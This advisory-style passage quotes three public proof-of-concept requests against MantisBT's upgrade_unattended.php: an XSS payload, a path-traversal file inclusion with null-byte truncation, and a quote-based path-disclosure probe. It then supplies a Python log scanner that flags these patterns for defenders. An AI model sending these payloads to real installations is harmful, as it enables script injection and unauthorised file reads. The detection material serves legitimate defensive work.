Public PoCs (from http://www.mantisbt.org/bugs/view.php?id=12607):
1) cross-site scripting (XSS): http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=%3Cscript%3Ealert%281%29%3C/script%3E
2) local file inclusion (LFI): http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
3) path disclosure (PD): http://[mantis_root_host]/admin/upgrade_unattended.php?db_type=%27
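All three PoCs abuse the same `db_type` parameter of `admin/upgrade_unattended.php`, so a defender can hunt for them in web server access logs with one check: decode `db_type` and flag any value that is not a plain lowercase driver name. The script below is an added example written for this advisory, not code from MantisBT or the bug report; the access-log lines, client addresses and the `VALID_DB_TYPE` pattern are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access-log sample: one legitimate upgrade request
# followed by the three public PoC requests (addresses are documentation ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2010:12:00:01 +0000] "GET /admin/upgrade_unattended.php?db_type=mysql HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2010:12:00:02 +0000] "GET /admin/upgrade_unattended.php?db_type=%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 771
203.0.113.7 - - [10/Oct/2010:12:00:03 +0000] "GET /admin/upgrade_unattended.php?db_type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 HTTP/1.1" 200 104
203.0.113.7 - - [10/Oct/2010:12:00:04 +0000] "GET /admin/upgrade_unattended.php?db_type=%27 HTTP/1.1" 200 633
"""

# Assumed allowlist shape: legitimate ADOdb driver names are short lowercase
# identifiers (mysql, pgsql, ...). Anything else in db_type is worth a look.
VALID_DB_TYPE = re.compile(r"^[a-z0-9_]{1,32}$")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

def classify_db_type(value):
    """Label a percent-decoded db_type value; None means it looks benign."""
    if VALID_DB_TYPE.match(value):
        return None
    if "\x00" in value or "../" in value or "..\\" in value:
        return "lfi"    # traversal and/or null-byte truncation of the include path
    if "<" in value or ">" in value:
        return "xss"    # markup reflected back into the upgrade page
    return "probe"      # e.g. a lone quote meant to trigger an error/path disclosure

def scan_log(text):
    """Return (client_ip, label, decoded_db_type) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/admin/upgrade_unattended.php"):
            continue
        # parse_qs percent-decodes, so %00 and %2f arrive as real bytes here.
        for value in parse_qs(url.query, keep_blank_values=True).get("db_type", []):
            label = classify_db_type(value)
            if label:
                hits.append((line.split(" ", 1)[0], label, value))
    return hits

if __name__ == "__main__":
    for ip, label, value in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value!r}")
```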